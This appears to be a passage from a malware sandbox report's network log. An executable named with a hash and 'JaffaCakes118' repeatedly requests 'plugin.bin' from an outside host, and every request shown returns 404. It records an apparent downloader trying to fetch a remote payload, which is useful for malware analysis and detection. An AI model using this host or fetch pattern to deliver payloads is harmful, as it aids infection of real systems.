      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:05 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGn3RgATubpPHNAqbG2IZiB8wo9%2Ft%2Fu73kdAYumQLN29%2Fa3iL%2BXHSEQ3P2uo4UxvwV4IWvRw44Y1iafPDSTJWC45sV3u1ef99qM2hwy6zafoQsPKCU0y62E0u%2Ff0"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b5a1ba76539-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:06 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: MISS
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3J3xZYzcjye076hFAxwN8v7s1sR3A0H86IWjTZmW7TRk72wSYnPk0tsI3Ssf7AHrV6Pxao0lFcOQWnaYu%2BMRrxCmKNIdIyvTnX0xxY%2F5g7uiuQWr94om6ydVY%2Bzm"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b5f9e507799-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:07 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LQKEcFoKp8ZNl1PLs1MHRLRlyV%2BG8yXlAUiekBUQ0Mg08Pn3V%2F%2Bvehd2wIUSejoPLExVhNJa8XqUIypFefTIZd5SejqTF6Nrk72RuA2ClOD9GVuZVOs65qo43aA"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b66bd3552ed-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:08 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unCXjX3gXdIQbZ2ulQEVWyd2VE%2Be9LEevyAFO%2FhNUhPAXlEpjItwCcmGV6aIj6oYVd1W5kLGAkz1p%2BFnBWQ6WPYMJeBWc9MeVCFGn4Aw%2B%2FSMm6%2BlzpMCS%2BiSfluU"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b6c3d2d943f-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:09 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRCHACb8r%2BVh3vQFhuLqmT3f1xJnM1fyM%2BWxQWgAjPIzb96c8xh6H6lJLnUHuUhZzLgk8e9sMhFmxo4kSOiyjl%2FjXRvIcyllW%2F3AltyRatE6sqEMe9qOe5siMPIR"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b731be06389-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:09 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QJ%2BJM5X3dwgZzbWMo0o4SNzdU%2FuA0h%2F92WrbuGJu7UvBWGP1jJ33S9e1vpf8xXPm%2FMwLLwLTgNHSHqoUrR6vSH7ZiHjMSniutSIsIS%2BIO8YF7YFdyxOqwGqDOeqg"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b78bd53944b-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:10 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uiRY%2Fx7TOe1st3p4wQjvpx%2BwGqU2cfWOUoZ%2F9FKfbvOXpWrhnRL5WYf6ZsNv6Mhy%2FHUh%2BXvDi5bi9q1guPy0sfZV8Kdpmik0xMF41w0GqG8r9W1NG%2BZlfXGOhrmS"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b7e0a0563c3-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      183.59.114.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.59.114.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.187.3.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.187.3.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:21 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwCLHR4w3D73I%2F6xYn6Y%2FlK2rfAQxVGbD34TW%2Fxcjv4pv5oFgfvg5sPPCy%2BlzPhL8OBibOwinvjo9CN%2Bk4Jywj45NVUPZghEtx4Fhr6%2BYXNjjgpaYJfnMrPMnBkx"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bc1fc8e639a-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:22 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXgU0U34j0lryZPOayS09Km71Svy2CHq9XlCaBsrRKCClmMwY1YDqMwejOycYEprodw55yuzXaPxo%2BRk6lID%2BEHNth2QfJ9bPUkm5dKjQGnE5mXCr2l7QKKxKFEQ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bc73bbd63af-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:23 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HnlUoVIl4Ebilo4yyA15aOltclkgpVed%2FNicG84QZhp%2F6ISHjuhg4B8%2BEYn10ovPjNOF1iHpR3aDMa2JetqKGG47WJ5Tb4btvynyXf8usxBXmOcTZGtD5RKAChjo"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bcc9c046421-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:24 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mMGOfcuCsgWSJ2%2FZv1MVUCatWZvd5R8WpbgNe%2FNPrvyJQQtTBRtL8PM9kviU1rS492eduxU%2F57fV4PfA4T0G%2BRvmuMpz0eWuOcItp4AS%2BlFKkTGbqH3UscZE1aja"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bd1dc6a93e3-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:25 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2C7f1lPSYsQNEciHuDj3VipO%2B8wrlqKUcG9UxSYpTrw74HVy0yIdtXF%2FApvZiSmndl3fkoXfw1MG4r0atgpTXXlqd4ZBwJL3C8KfkMXRbraa8h8Hdui6gEMdloX"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bd8db2b940c-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:26 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=chrBMZ7s%2BLfj1VHkSVlOIStbFpQouWsbTr4mDnjoqYAkjqq0YDV0yV32Tu00myvO5RcqtAJDQ32GQKdf0MEZQAMGtD7s3SUrRgCkU2KnINZgijpxYWDNIvlRoo7a"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bde5b0d9466-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:27 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9WAZW7YNEy62n2iC3utvwQa%2F7FikHD1Ns27XojX4QyolEKavtM6RIIDGK8SmAneEuo%2Fx%2BIF5%2BN9HbEzENQAqlVax0orDqdzOukD4MTB5OwIXREFnwQgs%2FrakzRM"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735be559a27315-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:28 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yia444a68a754Mlem8FC%2F480tYTq1mV87PVtI7AJMCxQF0LEt5i02pEEtnnq5OQj9f07V8ZHwviiJPJJBwCLNThXLnOnJjNJjSONJ7RSk4PJ410QBcrXIHTsuvFM"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bec4dcc03bb-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:29 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5hg07%2BpkzyjungpKcJy%2BJZM5f5vnS7d%2FXk1RC%2FnSnnWiW2sB8wnhOtc7OnuJCZqHxL0RjnkUxlarKvUXFgevHfUQciqskzDmMOpwWb6V4eC5hVtlMvcZt6Qnv7D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bf3ae4353a4-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:30 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V4ExejJ4DU9iqWXOLOjNjKyLH6LXGMMuTcmLRiahEoqutBglP2bkb0ooNMo3L6hGDQnNfyTRlvbgvUUG9fiOPpDKHXwx%2BSTCmGcizrVNTdMPk06Cm%2FkURSF7afEj"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bf8e8a23866-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:31 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woi9SZxqSX9hdUvYkC1GSJLA%2Bt6L%2FYXvXWwilDS0WLoM2nUNswuCL9QhE%2Bp1BRkmvpU%2BBLacipruN5GfNB1y8X3HmJVZj4lEKhT9wyKk0eD4McWm8OjgJ%2FlKQEj%2F"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735bfe38df9508-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:32 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QCQ9YdoiPUDuadIOAfvf4FU5U3y7EFFhL4sMxVKpmM2itvncaS2VGaaSgkn%2B67d5MTZDS3e3M9TlZJOckw97yLXLatkhxhyH7BmH8yzfVCpVwjuZHdOrVLjhN2BX"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c03ce7693e9-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
